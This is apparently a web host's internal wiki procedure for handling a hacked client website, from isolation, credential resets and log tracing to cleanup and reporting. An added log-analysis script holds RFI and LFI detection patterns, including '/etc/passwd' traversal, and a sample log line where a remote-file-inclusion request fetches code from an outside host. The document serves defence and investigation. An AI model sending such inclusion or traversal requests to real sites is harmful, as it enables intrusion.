Hacking Incident Guidelines

From WebFocus Wiki Site

WEB HACKING ISOLATION PROCEDURES


1. Immediately upload an "under development" placeholder page and rename the existing directory. **Do not overwrite the existing directory; create a new one.


2. Get the authorized email addresses of all involved parties and advise our client about the 24-hour investigation period. **Sales consultant, authorized contact info, support@servobox.com


3. Verify whether the hacked site is already tagged in Google's database; if not, move to step 5. A tagged site usually looks like the image below.


[Image: ReportedAttackSites.jpg]


4. If tagged, log in with shc.security@gmail.com to Google's Webmaster Tools, add the site to our list of managed sites and run a review. **Follow Google's instructions on how to add a site. The review normally takes more than 8 hours, but the technical in-charge should closely monitor its progress because it may finish in less than 8 hours.

5. For security purposes, reset all hosting credentials (control panel and FTP) and send them to the authorized email address. **Ask the client whether the authorized email address is valid; if not, coordinate with customer care to verify it.

6. Now, verify what type of hacking technique was used to deface the website.

a. Create a sub-domain and use hcks3r.domain.com as a standard hacked site name.

b. Move all files to the created sub-domain.

c. Upload a robots.txt file to their root directory that contains the following:


[Image: Code.jpg (robots.txt contents)]


7. Look for the compromised file or indexes (index.php, index.html, _about.html, or any other suspicious-looking files) and check when each was modified. Verify the modification date and take note of it. Then go to our server logs, usually found together with the domain directory.


8. Browse through the domain's web logs, usually found together with the domain directory on their FTP. Match the file modification dates against the log entries and check all traces, such as IP addresses or any other significant information, that will point to the identity of the hacker.

Types of Hacking:

a. FTP password theft

b. Remote File Inclusion Attacks (RFI)

c. Local File Inclusion attacks (LFI)

d. SQL injection attacks

e. Password attacks

f. Form mail spamming


Refer to this url: http://25yearsofprogramming.com/blog/2008/20080311.htm


The more common methods used to hack websites include:

• Hacked cPanel or FTP password

• Code injection - http://en.wikipedia.org/wiki/Code_injection

• Remote File Inclusion - http://en.wikipedia.org/wiki/Remote_File_Inclusion
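For steps 7 and 8, an added example (not part of the original guideline) that correlates a defaced file's modification time with the domain's access log: it keeps the requests in a window around that time, counts hits per IP, and flags requests whose query string carries a remote URL or directory traversal (RFI/LFI, hack types b and c) or that are POSTs. The log lines, IP addresses and timestamp are constructed.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Apache/cPanel "combined" access-log line, as found beside the domain directory.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Request shapes worth a closer look: a remote URL or directory traversal in the
# query string (RFI / LFI), plus any POST near the change (checked separately).
FLAGS = {"rfi": re.compile(r"[?&]\w+=https?://", re.I),
         "lfi": re.compile(r"\.\./|/etc/passwd", re.I)}

# Constructed sample log (not real traffic). The defaced index.html is assumed
# to have been found with modification time 11/Mar/2008 03:06:30 +0000.
SAMPLE_LOG = """\
203.0.113.9 - - [11/Mar/2008:02:14:07 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Mar/2008:03:05:41 +0000] "GET /index.php?page=http://203.0.113.55/x.txt HTTP/1.1" 200 881 "-" "curl/7.18"
198.51.100.7 - - [11/Mar/2008:03:06:12 +0000] "POST /images/up.php HTTP/1.1" 200 42 "-" "curl/7.18"
203.0.113.9 - - [11/Mar/2008:09:30:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def parse_ts(s):
    """Parse an Apache timestamp such as '11/Mar/2008:03:06:30 +0000'."""
    return datetime.strptime(s, "%d/%b/%Y:%H:%M:%S %z")

def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    out = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = parse_ts(e["ts"])
            out.append(e)
    return out

def correlate(entries, modified_at, before=timedelta(hours=1), after=timedelta(minutes=5)):
    """Keep requests in a window around the file's mtime; return (window, hits per IP, flagged)."""
    lo, hi = modified_at - before, modified_at + after
    window = [e for e in entries if lo <= e["ts"] <= hi]
    flagged = []
    for e in window:
        reasons = [name for name, rx in FLAGS.items() if rx.search(e["path"])]
        if e["method"] == "POST":
            reasons.append("post")
        if reasons:
            flagged.append((e["ip"], e["path"], reasons))
    return window, Counter(e["ip"] for e in window), flagged
```

Run it as `correlate(parse_log(SAMPLE_LOG), parse_ts("11/Mar/2008:03:06:30 +0000"))`; the flagged list and the per-IP counts are what go into the report's "traces" section.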


9. How do you fix the website that is hacked? It is difficult to give an exact method for resolving a hacking issue, as there are many different types of website hacks. Here are some general steps to take to correct the website:

a. Restore backup of your website. The easiest way is to restore your site from a version that was saved prior to the site being hacked.

b. Remove the injected code from the .htaccess file. Many times, if the site is hacked by code injection, a redirect will have been placed in the .htaccess file in the public_html folder. Open the .htaccess file and look for any lines that look suspicious. Delete the suspicious lines, and then save your changes.


10. How to prevent the site from being hacked.

Depending on the cause of the hack, there are some steps you can take to help prevent hacks in the future:

a. Change all passwords for the account. This is already mentioned in step 5 and is always the recommended first step. In case the passwords were compromised, change the H-Sphere password, the FTP accounts and the CMS login (Joomla, WordPress, etc.).

b. Update the web applications running on the hosting account. Many of our clients use third-party software such as Joomla, WordPress and others; make sure they are running the most up-to-date version, as security exploits may have been fixed by the developers.

c. Update all web development programs running on the web developer's or client's computer. Ask the client/developer whether they use Adobe products such as Flash or Dreamweaver. Tell them to scan their workstation regularly using the most up-to-date virus definitions in their anti-virus software.


11. You may now generate an initial report. Refer to the file IR_domain.docx found in \\orion\data\technical support\Reports\Hacking. **Make sure to save the document into the correct date and folder.


12. Send a copy first to your respective team leader to verify the report; the consultant will then forward the results to our client. **Generate the report in PDF format.